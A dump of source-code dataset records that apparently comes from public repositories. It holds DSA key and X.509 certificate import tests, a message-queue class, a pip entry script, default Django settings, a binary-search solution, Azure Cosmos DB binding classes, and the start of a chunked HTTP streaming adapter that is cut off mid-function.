'7e71bd8dbaf81eca7518d76c1d26256e95424864ba45ca5d47d7c5a421be02fa'+\
'b94ab01e18593f66cf9094eb5c94b9ecf3aa08b854a195cf87612fbe5e96c426'+\
'2b0d573e52dc71ba3f5e468c601e816c49b7d32c698b22175e89aaef0c443770'+\
'5ef2f88a116d99d8e2869a4fd09a771b84b49e4ccb79aadcb1c9'
def testImportKey10(self):
key_obj = DSA.importKey(self.der_pkcs8_encrypted, "PWDTEST")
self.failUnless(key_obj.has_private())
self.assertEqual(self.y, key_obj.y)
self.assertEqual(self.p, key_obj.p)
self.assertEqual(self.q, key_obj.q)
self.assertEqual(self.g, key_obj.g)
self.assertEqual(self.x, key_obj.x)
def testExportKey10(self):
tup = (self.y, self.g, self.p, self.q, self.x)
key = DSA.construct(tup)
randfunc = BytesIO(unhexlify(b("27A1C66C42AFEECE") + b("D725BF1B6B8239F4"))).read
encoded = key.export_key('DER', pkcs8=True, passphrase="PWDTEST", randfunc=randfunc)
self.assertEqual(self.der_pkcs8_encrypted, encoded)
# ----
def testImportError1(self):
self.assertRaises(ValueError, DSA.importKey, self.der_pkcs8_encrypted, "wrongpwd")
def testExportError2(self):
tup = (self.y, self.g, self.p, self.q, self.x)
key = DSA.construct(tup)
self.assertRaises(ValueError, key.export_key, 'DER', pkcs8=False, passphrase="PWDTEST")
def test_import_key(self):
"""Verify importKey is an alias to import_key"""
key_obj = DSA.import_key(self.der_public)
self.failIf(key_obj.has_private())
self.assertEqual(self.y, key_obj.y)
self.assertEqual(self.p, key_obj.p)
self.assertEqual(self.q, key_obj.q)
self.assertEqual(self.g, key_obj.g)
def test_exportKey(self):
tup = (self.y, self.g, self.p, self.q, self.x)
key = DSA.construct(tup)
self.assertEquals(key.exportKey(), key.export_key())
def test_import_empty(self):
self.assertRaises(ValueError, DSA.import_key, b'')
class ImportKeyFromX509Cert(unittest.TestCase):
def test_x509v1(self):
# Sample V1 certificate with a 1024 bit DSA key
x509_v1_cert = """
-----BEGIN CERTIFICATE-----
MIIDUjCCArsCAQIwDQYJKoZIhvcNAQEFBQAwfjENMAsGA1UEChMEQWNtZTELMAkG
A1UECxMCUkQxHDAaBgkqhkiG9w0BCQEWDXNwYW1AYWNtZS5vcmcxEzARBgNVBAcT
Ck1ldHJvcG9saXMxETAPBgNVBAgTCE5ldyBZb3JrMQswCQYDVQQGEwJVUzENMAsG
A1UEAxMEdGVzdDAeFw0xNDA3MTEyMDM4NDNaFw0xNzA0MDYyMDM4NDNaME0xCzAJ
BgNVBAYTAlVTMREwDwYDVQQIEwhOZXcgWW9yazENMAsGA1UEChMEQWNtZTELMAkG
A1UECxMCUkQxDzANBgNVBAMTBnBvbGFuZDCCAbYwggErBgcqhkjOOAQBMIIBHgKB
gQDOrN4Ox4+t3T6wKeHfhzArhcrNEFMQ4Ss+4PIKyimDy9Bn64WPkL1B/9dvYIga
23GLu6tVJmXo6EdJnVOHEMhr99EeOwuDWWeP7Awq7RSlKEejokr4BEzMTW/tExSD
cO6/GI7xzh0eTH+VTTPDfyrJMYCkh0rJAfCP+5xrmPNetwIVALtXYOV1yoRrzJ2Q
M5uEjidH6GiZAoGAfUqA1SAm5g5U68SILMVX9l5rq0OpB0waBMpJQ31/R/yXNDqo
c3gGWZTOJFU4IzwNpGhrGNADUByz/lc1SAOAdEJIr0JVrhbGewQjB4pWqoLGbBKz
RoavTNDc/zD7SYa12evWDHADwvlXoeQg+lWop1zS8OqaDC7aLGKpWN3/m8kDgYQA
AoGAKoirPAfcp1rbbl4y2FFAIktfW8f4+T7d2iKSg73aiVfujhNOt1Zz1lfC0NI2
eonLWO3tAM4XGKf1TLjb5UXngGn40okPsaA81YE6ZIKm20ywjlOY3QkAEdMaLVY3
9PJvM8RGB9m7pLKxyHfGMfF40MVN4222zKeGp7xhM0CNiCUwDQYJKoZIhvcNAQEF
BQADgYEAfbNZfpYa2KlALEM1FZnwvQDvJHntHz8LdeJ4WM7CXDlKi67wY2HKM30w
s2xej75imkVOFd1kF2d0A8sjfriXLVIt1Hwq9ANZomhu4Edx0xpH8tqdh/bDtnM2
TmduZNY9OWkb07h0CtWD6Zt8fhRllVsSSrlWd/2or7FXNC5weFQ=
-----END CERTIFICATE-----
""".strip()
# DSA public key as dumped by openssl
y_str = """
2a:88:ab:3c:07:dc:a7:5a:db:6e:5e:32:d8:51:40:
22:4b:5f:5b:c7:f8:f9:3e:dd:da:22:92:83:bd:da:
89:57:ee:8e:13:4e:b7:56:73:d6:57:c2:d0:d2:36:
7a:89:cb:58:ed:ed:00:ce:17:18:a7:f5:4c:b8:db:
e5:45:e7:80:69:f8:d2:89:0f:b1:a0:3c:d5:81:3a:
64:82:a6:db:4c:b0:8e:53:98:dd:09:00:11:d3:1a:
2d:56:37:f4:f2:6f:33:c4:46:07:d9:bb:a4:b2:b1:
c8:77:c6:31:f1:78:d0:c5:4d:e3:6d:b6:cc:a7:86:
a7:bc:61:33:40:8d:88:25
"""
p_str = """
00:ce:ac:de:0e:c7:8f:ad:dd:3e:b0:29:e1:df:87:
30:2b:85:ca:cd:10:53:10:e1:2b:3e:e0:f2:0a:ca:
29:83:cb:d0:67:eb:85:8f:90:bd:41:ff:d7:6f:60:
88:1a:db:71:8b:bb:ab:55:26:65:e8:e8:47:49:9d:
53:87:10:c8:6b:f7:d1:1e:3b:0b:83:59:67:8f:ec:
0c:2a:ed:14:a5:28:47:a3:a2:4a:f8:04:4c:cc:4d:
6f:ed:13:14:83:70:ee:bf:18:8e:f1:ce:1d:1e:4c:
7f:95:4d:33:c3:7f:2a:c9:31:80:a4:87:4a:c9:01:
f0:8f:fb:9c:6b:98:f3:5e:b7
"""
q_str = """
00:bb:57:60:e5:75:ca:84:6b:cc:9d:90:33:9b:84:
8e:27:47:e8:68:99
"""
g_str = """
7d:4a:80:d5:20:26:e6:0e:54:eb:c4:88:2c:c5:57:
f6:5e:6b:ab:43:a9:07:4c:1a:04:ca:49:43:7d:7f:
47:fc:97:34:3a:a8:73:78:06:59:94:ce:24:55:38:
23:3c:0d:a4:68:6b:18:d0:03:50:1c:b3:fe:57:35:
48:03:80:74:42:48:af:42:55:ae:16:c6:7b:04:23:
07:8a:56:aa:82:c6:6c:12:b3:46:86:af:4c:d0:dc:
ff:30:fb:49:86:b5:d9:eb:d6:0c:70:03:c2:f9:57:
a1:e4:20:fa:55:a8:a7:5c:d2:f0:ea:9a:0c:2e:da:
2c:62:a9:58:dd:ff:9b:c9
"""
key = DSA.importKey(x509_v1_cert)
for comp_name in ('y', 'p', 'q', 'g'):
comp_str = locals()[comp_name + "_str"]
comp = int(re.sub("[^0-9a-f]", "", comp_str), 16)
self.assertEqual(getattr(key, comp_name), comp)
self.failIf(key.has_private())
def test_x509v3(self):
# Sample V3 certificate with a 1024 bit DSA key
x509_v3_cert = """
-----BEGIN CERTIFICATE-----
MIIFhjCCA26gAwIBAgIBAzANBgkqhkiG9w0BAQsFADBhMQswCQYDVQQGEwJVUzEL
MAkGA1UECAwCTUQxEjAQBgNVBAcMCUJhbHRpbW9yZTEQMA4GA1UEAwwHVGVzdCBD
QTEfMB0GCSqGSIb3DQEJARYQdGVzdEBleGFtcGxlLmNvbTAeFw0xNDA3MTMyMDUz
MjBaFw0xNzA0MDgyMDUzMjBaMEAxCzAJBgNVBAYTAlVTMQswCQYDVQQIDAJNRDES
MBAGA1UEBwwJQmFsdGltb3JlMRAwDgYDVQQDDAdhdXN0cmlhMIIBtjCCASsGByqG
SM44BAEwggEeAoGBALfd8gyEpVPA0ZI69Kp3nyJcu5N0ZZ3K1K9hleQLNqKEcZOh
7a/C2J1TPdmHTLJ0rAwBZ1nWxnARSgRphziGDFspKCYQwYcSMz8KoFgvXbXpuchy
oFACiQ2LqZnc5MakuLQtLcQciSYGYj3zmZdYMoa904F1aDWr+DxQI6DVC3/bAhUA
hqXMCJ6fQK3G2O9S3/CC/yVZXCsCgYBRXROl3R2khX7l10LQjDEgo3B1IzjXU/jP
McMBl6XO+nBJXxr/scbq8Ajiv7LTnGpSjgryHtvfj887kfvo8QbSS3kp3vq5uSqI
ui7E7r3jguWaLj616AG1HWOctXJUjqsiabZwsp2h09gHTzmHEXBOmiARu8xFxKAH
xsuo7onAbwOBhAACgYBylWjWSnKHE8mHx1A5m/0GQx6xnhWIe3+MJAnEhRGxA2J4
SCsfWU0OwglIQToh1z5uUU9oDi9cYgNPBevOFRnDhc2yaJY6VAYnI+D+6J5IU6Yd
0iaG/iSc4sV4bFr0axcPpse3SN0XaQxiKeSFBfFnoMqL+dd9Gb3QPZSllBcVD6OB
1TCB0jAdBgNVHQ4EFgQUx5wN0Puotv388M9Tp/fsPbZpzAUwHwYDVR0jBBgwFoAU
a0hkif3RMaraiWtsOOZZlLu9wJwwCQYDVR0TBAIwADALBgNVHQ8EBAMCBeAwSgYD
VR0RBEMwQYILZXhhbXBsZS5jb22CD3d3dy5leGFtcGxlLmNvbYIQbWFpbC5leGFt
cGxlLmNvbYIPZnRwLmV4YW1wbGUuY29tMCwGCWCGSAGG+EIBDQQfFh1PcGVuU1NM
IEdlbmVyYXRlZCBDZXJ0aWZpY2F0ZTANBgkqhkiG9w0BAQsFAAOCAgEAyWf1TiJI
aNEIA9o/PG8/JiGASTS2/HBVTJbkq03k6NkJVk/GxC1DPziTUJ+CdWlHWcAi1EOW
Ach3QxNDRrVfCOfCMDgElIO1094/reJgdFYG00LRi8QkRJuxANV7YS4tLudhyHJC
kR2lhdMNmEuzWK+s2y+5cLrdm7qdvdENQCcV67uvGPx4sc+EaE7x13SczKjWBtbo
QCs6JTOW+EkPRl4Zo27K4OIZ43/J+GxvwU9QUVH3wPVdbbLNw+QeTFBYMTEcxyc4
kv50HPBFaithziXBFyvdIs19FjkFzu0Uz/e0zb1+vMzQlJMD94HVOrMnIj5Sb2cL
KKdYXS4uhxFJmdV091Xur5JkYYwEzuaGav7J3zOzYutrIGTgDluLCvA+VQkRcTsy
jZ065SkY/v+38QHp+cmm8WRluupJTs8wYzVp6Fu0iFaaK7ztFmaZmHpiPIfDFjva
aCIgzzT5NweJd/b71A2SyzHXJ14zBXsr1PMylMp2TpHIidhuuNuQL6I0HaollB4M
Z3FsVBMhVDw4Z76qnFPr8mZE2tar33hSlJI/3pS/bBiukuBk8U7VB0X8OqaUnP3C
7b2Z4G8GtqDVcKGMzkvMjT4n9rKd/Le+qHSsQOGO9W/0LB7UDAZSwUsfAPnoBgdS
5t9tIomLCOstByXi+gGZue1TcdCa3Ph4kO0=
-----END CERTIFICATE-----
""".strip()
# DSA public key as dumped by openssl
y_str = """
72:95:68:d6:4a:72:87:13:c9:87:c7:50:39:9b:fd:
06:43:1e:b1:9e:15:88:7b:7f:8c:24:09:c4:85:11:
b1:03:62:78:48:2b:1f:59:4d:0e:c2:09:48:41:3a:
21:d7:3e:6e:51:4f:68:0e:2f:5c:62:03:4f:05:eb:
ce:15:19:c3:85:cd:b2:68:96:3a:54:06:27:23:e0:
fe:e8:9e:48:53:a6:1d:d2:26:86:fe:24:9c:e2:c5:
78:6c:5a:f4:6b:17:0f:a6:c7:b7:48:dd:17:69:0c:
62:29:e4:85:05:f1:67:a0:ca:8b:f9:d7:7d:19:bd:
d0:3d:94:a5:94:17:15:0f
"""
p_str = """
00:b7:dd:f2:0c:84:a5:53:c0:d1:92:3a:f4:aa:77:
9f:22:5c:bb:93:74:65:9d:ca:d4:af:61:95:e4:0b:
36:a2:84:71:93:a1:ed:af:c2:d8:9d:53:3d:d9:87:
4c:b2:74:ac:0c:01:67:59:d6:c6:70:11:4a:04:69:
87:38:86:0c:5b:29:28:26:10:c1:87:12:33:3f:0a:
a0:58:2f:5d:b5:e9:b9:c8:72:a0:50:02:89:0d:8b:
a9:99:dc:e4:c6:a4:b8:b4:2d:2d:c4:1c:89:26:06:
62:3d:f3:99:97:58:32:86:bd:d3:81:75:68:35:ab:
f8:3c:50:23:a0:d5:0b:7f:db
"""
q_str = """
00:86:a5:cc:08:9e:9f:40:ad:c6:d8:ef:52:df:f0:
82:ff:25:59:5c:2b
"""
g_str = """
51:5d:13:a5:dd:1d:a4:85:7e:e5:d7:42:d0:8c:31:
20:a3:70:75:23:38:d7:53:f8:cf:31:c3:01:97:a5:
ce:fa:70:49:5f:1a:ff:b1:c6:ea:f0:08:e2:bf:b2:
d3:9c:6a:52:8e:0a:f2:1e:db:df:8f:cf:3b:91:fb:
e8:f1:06:d2:4b:79:29:de:fa:b9:b9:2a:88:ba:2e:
c4:ee:bd:e3:82:e5:9a:2e:3e:b5:e8:01:b5:1d:63:
9c:b5:72:54:8e:ab:22:69:b6:70:b2:9d:a1:d3:d8:
07:4f:39:87:11:70:4e:9a:20:11:bb:cc:45:c4:a0:
07:c6:cb:a8:ee:89:c0:6f
"""
key = DSA.importKey(x509_v3_cert)
for comp_name in ('y', 'p', 'q', 'g'):
comp_str = locals()[comp_name + "_str"]
comp = int(re.sub("[^0-9a-f]", "", comp_str), 16)
self.assertEqual(getattr(key, comp_name), comp)
self.failIf(key.has_private())
if __name__ == '__main__':
unittest.main()
def get_tests(config={}):
tests = []
tests += list_test_cases(ImportKeyTests)
tests += list_test_cases(ImportKeyFromX509Cert)
return tests
if __name__ == '__main__':
suite = lambda: unittest.TestSuite(get_tests())
unittest.main(defaultTest='suite')
|
[
"lit2020026@gmail.com"
] |
lit2020026@gmail.com
|
114b3d3a2bf7d6786729b241bf34b660dd8e5767
|
934e3d3d31fd25b1d389f02f8dfb9526ab831c30
|
/snakemq/message.py
|
d92ff84a1d40ff35480dc548e98298fced5ddb41
|
[
"MIT"
] |
permissive
|
dsiroky/snakemq
|
e98a3e13b1336fff8c7d5e4f7bdb33df3f9b41e9
|
2d53a25c7ef613bc7cc1e4e8e39ab4fc5990a1a5
|
refs/heads/master
| 2021-01-17T13:58:08.701625
| 2021-01-08T15:09:04
| 2021-01-08T15:54:09
| 4,480,770
| 93
| 31
|
MIT
| 2021-01-08T15:54:11
| 2012-05-29T10:35:43
|
Python
|
UTF-8
|
Python
| false
| false
| 1,481
|
py
|
# -*- coding: utf-8 -*-
"""
Message container.
:author: David Siroky (siroky@dasir.cz)
:license: MIT License (see LICENSE.txt or
U{http://www.opensource.org/licenses/mit-license.php})
"""
import uuid as uuid_module
###########################################################################
###########################################################################
FLAG_PERSISTENT = 0x1 #: store to a persistent storage
MAX_UUID_LENGTH = 16
###########################################################################
###########################################################################
class Message(object):
def __init__(self, data, ttl=0, flags=0, uuid=None):
"""
:param data: (bytes) payload
:param ttl: messaging TTL in seconds (integer or float), None is infinity
:param flags: combination of FLAG_*
:param uuid: (bytes) unique message identifier (implicitly generated)
"""
assert type(data) == bytes
assert uuid is None or (type(uuid) == bytes), uuid
self.data = data
self.ttl = None if ttl is None else float(ttl)
self.flags = flags
self.uuid = (uuid or bytes(uuid_module.uuid4().bytes))[:MAX_UUID_LENGTH]
############################################################
def __repr__(self):
return "<%s id=%X uuid=%r ttl=%r len=%i>" % (
self.__class__.__name__, id(self), self.uuid,
self.ttl, len(self.data))
|
[
"siroky@dasir.cz@33c95183-15fb-0310-8df2-8fb703102c40"
] |
siroky@dasir.cz@33c95183-15fb-0310-8df2-8fb703102c40
|
a567f145f84cac46f8e11448ac4a8fa59e6465a1
|
ca200e687345bad0b9cdd96cb9fa9eca6a988064
|
/Python/venv/bin/pip3
|
550a2751dadf5e9b7432b17e7089b7992a0d4d46
|
[
"MIT"
] |
permissive
|
Nyahmi/ET-WorldGenerator
|
457799fc3116ceaf9cfd5fed509db4300202baf6
|
7506102ca1116536ebcdcdb352cf96b93cd53120
|
refs/heads/master
| 2022-04-26T18:09:11.286810
| 2020-04-10T21:32:51
| 2020-04-10T21:32:51
| 254,658,009
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 411
|
#!/home/onyx_systems/PycharmProjects/Python-ET/venv/bin/python
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==19.0.3','console_scripts','pip3'
__requires__ = 'pip==19.0.3'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('pip==19.0.3', 'console_scripts', 'pip3')()
)
|
[
"beta.nara.softworks@gmail.com"
] |
beta.nara.softworks@gmail.com
|
|
c8fce935f78fcfd518f015bd17919a744309a23d
|
06280e8f429caadda78d251a31647e7cc99653a8
|
/Agenda/Agenda/settings.py
|
db88366ed20b6782220cc2f2fa5023d8b3f24216
|
[] |
no_license
|
joaovmoreno/Agenda
|
3341f2fe6124465c46bed4d85776019e26ee3a78
|
cf0b431eb7653c550f12687bac431c989c49a450
|
refs/heads/master
| 2021-09-15T21:59:36.773294
| 2018-06-11T19:35:22
| 2018-06-11T19:35:25
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,180
|
py
|
"""
Django settings for Agenda project.
Generated by 'django-admin startproject' using Django 2.0.5.
For more information on this file, see
https://docs.djangoproject.com/en/2.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.0/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'h0rmbh-5^8mx8#h8bq_+brswj0)3vum_#ds=v20b-#p&v-gto('
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'Agendas.apps.AgendasConfig',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'Agenda.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')]
,
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'Agenda.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.0/topics/i18n/
LANGUAGE_CODE = 'pt-br'
TIME_ZONE = 'America/Araguaina'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.0/howto/static-files/
STATIC_URL = '/static/'
|
[
"jvmoreno99@gmail.com"
] |
jvmoreno99@gmail.com
|
da2a8a45dfcd2377d5023092202df8631ca25576
|
06b46b09d0055c155a536137e3dd68e03f205799
|
/35. Search Insert Position/BinarySearch.py
|
a5457e3cceeee027c33dc916c7bb2f1678275c15
|
[] |
no_license
|
Amyoyoyo/LeetCode
|
89a469c9c02bb74415eec4850444468e813b5662
|
66f739c3cf1d3ecc5267de3b07081893024b7272
|
refs/heads/master
| 2020-07-06T08:25:43.414994
| 2019-08-25T11:39:17
| 2019-08-25T11:39:17
| 202,954,885
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 732
|
py
|
class Solution(object):
def searchInsert(self, nums, target):
if nums[len(nums) - 1] < target:
return len(nums)
left = 0
right = len(nums) - 1
while left < right:
mid = left + (right - left) // 2
if nums[mid] < target:
left = mid + 1
else:
right = mid
return left
'''
Runtime: 32 ms, faster than 86.48% of Python online submissions for Search Insert Position.
Memory Usage: 12.3 MB, less than 56.14% of Python online submissions for Search Insert Position.
'''
if __name__ == '__main__':
nums = [1, 3, 5, 6]
target = 4
sol = Solution()
ans = sol.searchInsert(nums, target)
print(ans)
|
[
"2929081453@qq.com"
] |
2929081453@qq.com
|
0a153aa851b34fa7e47730638bf43b10d4f5b386
|
163e851e35b1c7cf61051ad111f5928ce72ded0a
|
/azure/functions/decorators/cosmosdb.py
|
d9a281e838f7cddad93240c49b99aea891d58560
|
[
"MIT",
"LicenseRef-scancode-generic-cla"
] |
permissive
|
Azure/azure-functions-python-library
|
b410ae8c6103cdabdd790fecd55f0c945321ca01
|
88f96d360458a62a2139d1b9f60cffa6f7783bbe
|
refs/heads/dev
| 2023-08-28T12:49:45.754018
| 2023-08-10T16:05:01
| 2023-08-10T16:05:01
| 136,426,082
| 118
| 51
|
MIT
| 2023-08-31T22:57:29
| 2018-06-07T05:29:14
|
Python
|
UTF-8
|
Python
| false
| false
| 9,264
|
py
|
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
from datetime import time
from typing import Optional, Union
from azure.functions.decorators.constants import COSMOS_DB, COSMOS_DB_TRIGGER
from azure.functions.decorators.core import DataType, InputBinding, \
OutputBinding, Trigger
# Used by cosmos_db_input_v3
class CosmosDBInputV3(InputBinding):
@staticmethod
def get_binding_name() -> str:
return COSMOS_DB
def __init__(self,
name: str,
database_name: str,
collection_name: str,
connection_string_setting: str,
data_type: Optional[DataType] = None,
id: Optional[str] = None,
sql_query: Optional[str] = None,
partition_key: Optional[str] = None,
**kwargs):
self.database_name = database_name
self.collection_name = collection_name
self.connection_string_setting = connection_string_setting
self.partition_key = partition_key
self.id = id
self.sql_query = sql_query
super().__init__(name=name, data_type=data_type)
# Used by cosmos_db_output_v3
class CosmosDBOutputV3(OutputBinding):
@staticmethod
def get_binding_name() -> str:
return COSMOS_DB
def __init__(self,
name: str,
database_name: str,
collection_name: str,
connection_string_setting: str,
create_if_not_exists: Optional[bool] = None,
collection_throughput: Optional[int] = None,
use_multiple_write_locations: Optional[bool] = None,
preferred_locations: Optional[str] = None,
partition_key: Optional[str] = None,
data_type: Optional[DataType] = None,
**kwargs):
self.database_name = database_name
self.collection_name = collection_name
self.connection_string_setting = connection_string_setting
self.create_if_not_exists = create_if_not_exists
self.partition_key = partition_key
self.collection_throughput = collection_throughput
self.use_multiple_write_locations = use_multiple_write_locations
self.preferred_locations = preferred_locations
super().__init__(name=name, data_type=data_type)
# Used by cosmos_db_output_v3
class CosmosDBTriggerV3(Trigger):
@staticmethod
def get_binding_name() -> str:
return COSMOS_DB_TRIGGER
def __init__(self,
name: str,
database_name: str,
collection_name: str,
connection_string_setting: str,
leases_collection_throughput: Optional[int] = None,
checkpoint_interval: Optional[int] = None,
checkpoint_document_count: Optional[int] = None,
feed_poll_delay: Optional[int] = None,
lease_renew_interval: Optional[int] = None,
lease_acquire_interval: Optional[int] = None,
lease_expiration_interval: Optional[int] = None,
max_items_per_invocation: Optional[int] = None,
start_from_beginning: Optional[bool] = None,
create_lease_collection_if_not_exists: Optional[bool] = None,
preferred_locations: Optional[str] = None,
data_type: Optional[Union[DataType]] = None,
lease_collection_name: Optional[str] = None,
lease_connection_string_setting: Optional[str] = None,
lease_database_name: Optional[str] = None,
lease_collection_prefix: Optional[str] = None,
**kwargs):
self.lease_collection_name = lease_collection_name
self.lease_connection_string_setting = lease_connection_string_setting
self.lease_database_name = lease_database_name
self.create_lease_collection_if_not_exists = \
create_lease_collection_if_not_exists
self.leases_collection_throughput = leases_collection_throughput
self.lease_collection_prefix = lease_collection_prefix
self.checkpoint_interval = checkpoint_interval
self.checkpoint_document_count = checkpoint_document_count
self.feed_poll_delay = feed_poll_delay
self.lease_renew_interval = lease_renew_interval
self.lease_acquire_interval = lease_acquire_interval
self.lease_expiration_interval = lease_expiration_interval
self.max_items_per_invocation = max_items_per_invocation
self.start_from_beginning = start_from_beginning
self.preferred_locations = preferred_locations
self.connection_string_setting = connection_string_setting
self.database_name = database_name
self.collection_name = collection_name
super().__init__(name=name, data_type=data_type)
# Used by cosmos_db_input
class CosmosDBInput(InputBinding):
@staticmethod
def get_binding_name() -> str:
return COSMOS_DB
def __init__(self,
name: str,
connection: str,
database_name: str,
container_name: str,
partition_key: Optional[str] = None,
data_type: Optional[DataType] = None,
id: Optional[str] = None,
sql_query: Optional[str] = None,
preferred_locations: Optional[str] = None,
**kwargs):
self.database_name = database_name
self.container_name = container_name
self.connection = connection
self.partition_key = partition_key
self.id = id
self.sql_query = sql_query
self.preferred_locations = preferred_locations
super().__init__(name=name, data_type=data_type)
# Used by cosmos_db_output
class CosmosDBOutput(OutputBinding):
@staticmethod
def get_binding_name() -> str:
return COSMOS_DB
def __init__(self,
name: str,
connection: str,
database_name: str,
container_name: str,
create_if_not_exists: Optional[bool] = None,
partition_key: Optional[str] = None,
container_throughput: Optional[int] = None,
preferred_locations: Optional[str] = None,
data_type: Optional[DataType] = None,
**kwargs):
self.connection = connection
self.database_name = database_name
self.container_name = container_name
self.create_if_not_exists = create_if_not_exists
self.partition_key = partition_key
self.container_throughput = container_throughput
self.preferred_locations = preferred_locations
super().__init__(name=name, data_type=data_type)
# Used by cosmos_db_trigger
class CosmosDBTrigger(Trigger):
@staticmethod
def get_binding_name() -> str:
return COSMOS_DB_TRIGGER
def __init__(self,
name: str,
connection: str,
database_name: str,
container_name: str,
lease_connection: Optional[str] = None,
lease_database_name: Optional[str] = None,
lease_container_name: Optional[str] = None,
create_lease_container_if_not_exists: Optional[
bool] = None,
leases_container_throughput: Optional[int] = None,
lease_container_prefix: Optional[str] = None,
feed_poll_delay: Optional[int] = None,
lease_acquire_interval: Optional[int] = None,
lease_expiration_interval: Optional[int] = None,
lease_renew_interval: Optional[int] = None,
max_items_per_invocation: Optional[int] = None,
start_from_beginning: Optional[time] = None,
start_from_time: Optional[time] = None,
preferred_locations: Optional[str] = None,
data_type: Optional[Union[DataType]] = None,
**kwargs):
self.connection = connection
self.database_name = database_name
self.container_name = container_name
self.lease_connection = lease_connection
self.lease_database_name = lease_database_name
self.lease_container_name = lease_container_name
self.create_lease_container_if_not_exists = \
create_lease_container_if_not_exists
self.leases_container_throughput = leases_container_throughput
self.lease_container_prefix = lease_container_prefix
self.feed_poll_delay = feed_poll_delay
self.lease_acquire_interval = lease_acquire_interval
self.lease_expiration_interval = lease_expiration_interval
self.lease_renew_interval = lease_renew_interval
self.max_items_per_invocation = max_items_per_invocation
self.start_from_beginning = start_from_beginning
self.start_from_time = start_from_time
self.preferred_locations = preferred_locations
super().__init__(name=name, data_type=data_type)
|
[
"noreply@github.com"
] |
Azure.noreply@github.com
|
621a7d4cf7d438dce2c1005eca31a958674e1786
|
2369be86c388e6a0d8bdaeeec17374213f39a30d
|
/kuankr_utils/requests.py
|
d92ec3c7620c2a50eabbef0a2d21e9583aa191d5
|
[] |
no_license
|
kkyt/kuankr-utils-py
|
9ac3df53e6fc27575cee5e8a2e71c0b91269b44c
|
fc14b8d06c9436313b7ac4e3e407cadaf6dafa70
|
refs/heads/master
| 2020-03-28T03:59:58.488061
| 2018-09-08T06:49:10
| 2018-09-08T06:49:10
| 147,688,279
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,950
|
py
|
#coding: utf8
#http://mihai.ibanescu.net/chunked-encoding-and-python-requests
from __future__ import absolute_import
import httplib
import requests
#from requests.adapters import HTTPAdapter, TimeoutSauce
from requests.adapters import *
from requests.adapters import _ProxyError, _HTTPError, _SSLError
import sys
def response_hook(response, *args, **kwargs):
response.iter_chunks = lambda amt=None: iter_chunks(response.raw._fp, amt=amt)
return response
def iter_chunks(response, amt=None):
"""
A copy-paste version of httplib.HTTPConnection._read_chunked() that
yields chunks served by the server.
"""
if response.chunked:
while True:
line = response.fp.readline().strip()
arr = line.split(';', 1)
try:
chunk_size = int(arr[0], 16)
except ValueError:
response.close()
raise httplib.IncompleteRead(chunk_size)
if chunk_size == 0:
break
value = response._safe_read(chunk_size)
yield value
# we read the whole chunk, get another
response._safe_read(2) # toss the CRLF at the end of the chunk
# read and discard trailer up to the CRLF terminator
### note: we shouldn't have any trailers!
while True:
line = response.fp.readline()
if not line:
# a vanishingly small number of sites EOF without
# sending the trailer
break
if line == '\r\n':
break
# we read everything; close the "file"
response.close()
else:
# Non-chunked response. If amt is None, then just drop back to
# response.read()
if amt is None:
r = response.read()
#NOTE: don't yield empty chunk
if r:
yield r
else:
# Yield chunks as read from the HTTP connection
while True:
ret = response.read(amt)
if not ret:
break
yield ret
class HTTPStreamAdapter(HTTPAdapter):
def send(self, request, stream=False, timeout=None, verify=True, cert=None, proxies=None):
import gevent
conn = self.get_connection(request.url, proxies)
self.cert_verify(conn, request.url, verify, cert)
url = self.request_url(request, proxies)
self.add_headers(request)
chunked = not (request.body is None or 'Content-Length' in request.headers)
timeout = TimeoutSauce(connect=timeout, read=timeout)
try:
if not chunked:
resp = conn.urlopen(
method=request.method,
url=url,
body=request.body,
headers=request.headers,
redirect=False,
assert_same_host=False,
preload_content=False,
decode_content=False,
retries=self.max_retries,
timeout=timeout
)
# Send the request.
else:
if hasattr(conn, 'proxy_pool'):
